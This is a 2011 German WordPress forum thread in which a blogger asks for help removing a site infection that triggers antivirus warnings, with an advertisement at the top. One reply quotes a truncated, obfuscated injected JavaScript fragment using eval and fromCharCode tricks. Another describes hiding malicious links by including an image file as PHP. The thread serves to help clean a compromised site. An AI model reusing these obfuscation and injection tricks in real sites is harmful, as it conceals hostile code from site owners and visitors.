• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• ich komm einfach nicht weiter und zwar bekomme ich dieses hier angezeigt
    http://i53.tinypic.com/21k06jm.jpg
    aber ich finde dieses healthcare nicht und auch keinen eintrag oder so

Vermutlich hast du in deiner Datenbank in den postings ein Java Script.

Code
    <script>String.prototype.test="harC";
    for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();
    d2=new Date(d.valueOf()-2);Object.prototype.asd="e";
    try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=d2-d;} 
    n=[7-h,7-h,103-h,100-h,30-h,38-

oder eine Datei wurde geändert?

Viel Glück

ralf

Mit offenen Augen träumen

• ich hab dieses plugin von wordpress drauf "anti vir" das zeigt mir aber nichts an....

r23
    wo hast du das script gefunden? ich finde es noch nicht einmal im quelltext???? wie soll ich das jetzt finden? suchen?

ich lad gerade den ganzen blog runter und lass dann antivir drüber laufen (in wp cache hat er einiges gefunden, soll ich dann lieber das plugin deinstallieren wenn da so leicht viruse drauf können?), wenn ich da nichts finde wie mach ich das mit der datenbank???

Danke für die hilfe
    Nicole

• bekomme zwar nicht diese meldung angezeigt aber unten wo man sieht wo der sie seiten aufbaut steht bei mir: [Blockierte Grafik: http://i55.tinypic.com/6t09jl.jpg]

Desweiteren ist seid gestern auf einmal eine Virus/trojaner Meldung...
    JS Frame blablabla

Hoffe jemand hat eine Ahung wie ich den Blog wieder sauber bekomme.

Einmal editiert, zuletzt von Topsi (8. September 2011 um 14:49)

• Hallo Nicole

r23
    wo hast du das script gefunden? ich finde es noch nicht einmal im quelltext???? wie soll ich das jetzt finden? suchen?

Es war nur ein Beispiel, wie man Adressen auch verstecken kann. Und nein, ich habe mir deine Seite nicht freiwillig ansehen.

ich lad gerade den ganzen blog runter und lass dann antivir drüber laufen (in wp cache hat er einiges gefunden, soll ich dann lieber das plugin deinstallieren wenn da so leicht viruse drauf können?)

Der Cache ist vermutlich nur verseucht und nicht der Grund für deine Sicherheitslücke.

Den Cache solltest du löschen.

lg

ralf

Mit offenen Augen träumen

• lösche ALLE Plugins und teste, ob noch immer die Meldung kommt. Oftmals sind ältere, schlecht gemachte Plugins Einfalltor für Angriffe.
    Topsi: halte Dich bitte aus dem Thread raus, sonst besteht die Gefahr, dass Windgeflüster mit seinem Problem unter die Räder kommt.

• also ich hab jetzt anti malware laufen lassen & anti-virus, hab dateien im editor geöffnet, gegoogelt, ich finde keine dateien... in meiner sql finde ich auch nix ... wenn ich die localhost datei mit dem editor öffne, dann nach "arr="646f6375" müsste ich das doch dann so auch finden wie es mir hier angezeigt wird http://sitecheck.sucuri.net/scanner/ oder?

http://www.urlvoid.com/

Einmal editiert, zuletzt von Windgeflüster (8. September 2011 um 22:36)

• ich hatte mal versteckt links die in einer grafik hinterlegt waren.

hatte diese zeile in meiner sidebar.php= <?php require 'images/bg2.png'; ?>
    die links war dann in dieser grafik versteckt= bg2.png

keine ahnung ob es dir hilft, ist aber vielleicht ein neuer ansatz für dich nach dem mistding zu suchen.

gruß alfredino

Einmal editiert, zuletzt von alfredinoK (9. September 2011 um 06:40)

• ich schmeiß gerade alles komplett runter, und lade das wp nochmal neu hoch (hab zwar im dashboard nochmal installieren lassen aber naja, so ist erstmal alles leer), Meinen hoster hab ich auch angeschrieben ob er ein backup drauf spielen könnte und jetzt lad ich halt mal eins nach dem anderen langsam von bildern hoch in der hoffnung das blöde ding ist weg :(

FALLS ich es wegbekomme, kann mir jemand sagen wie ich mich am besten vor soetwas schütze? ich hab antivir drauf und es hat NIX gebracht (also das auf dem WP blog! bin da etwas enttäuscht).

FAlls ich es immernoch nicht wegbekomme was soll ich denn dann machen?

• Zitat

FAlls ich es immernoch nicht wegbekomme was soll ich denn dann machen?

hast du eigentlich schon mal versucht dein momentanes theme zu deaktivieren und ein anderes theme zu aktivieren. wenn's dann weg ist, weißt du das es an deinem theme lag.

so wie ich das sehe, hast du selber gar keinen virus auf deinem blog, sondern nur ein link der eine viruswarnung verursacht. du solltst möglichst rausfinden wie dieser link auf deinen blog gelangen konnte.

gut möglich, das deine theme schon nicht ok war und dort was versteckt wurde - war bei mir jedenfalls so. manche anbieter von free-themes sind mit vorsicht zu genießen. da kann ich dir nur empfehlen ein paar euros zu investieren und ein theme zu kaufen.

ansonsten immer aktuell sein, spricht regelmäßige updates machen um eventuelle sicherheitslücken zu schließen. du solltst auch nach möglichkeit ein eigenes kennwort wählen und nicht das von wp vorgegebene verwenden. ich schütze meinen wp-adminbereich z.b. in dem ich einfach die wp-login.php nicht öffentlich zugänglich lasse.

gruß alfredino

Einmal editiert, zuletzt von alfredinoK (9. September 2011 um 11:07)

• YEAHA wir (mein blog und ich) sind wieder Gesund und munter YIPPIE YEAHA! updates mach ich aus dem grund sobald es eins gibt .... trotzdem hab ich mir irgendwie die malware eingefangen ,..... wie kann ich gar nicht sagen ... keine ahnung :(

ich habe eigentlich echt ein sicheres passwort mit groß und klein schreibung und zahlen .... und auch admin gibt es bei mir nicht...

kann gut sein das es am theme liegt ich hab das theme "gemixt" also aus 2 themes 1s gemacht, ich bin aber leider nicht so ein mega track das ich jetzt sagen könnte wo das "loch" ist. wollte mir schon ein premium kaufen aber leider keins gefunden wie ich es wollte...

Einmal editiert, zuletzt von Windgeflüster (9. September 2011 um 14:42)

• so jetzt hat mir meine tante gerade eine email geschrieben, sie hat den gleichen virus! 1. anderer hoster 2. ganz andere plugins usw und trotzdem hat sie diesen Virus??? das muß ja an WP dann liegen oder???
    Topsi hatte ja auch das gleiche problem..... komisch

Einmal editiert, zuletzt von Windgeflüster (9. September 2011 um 21:39)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!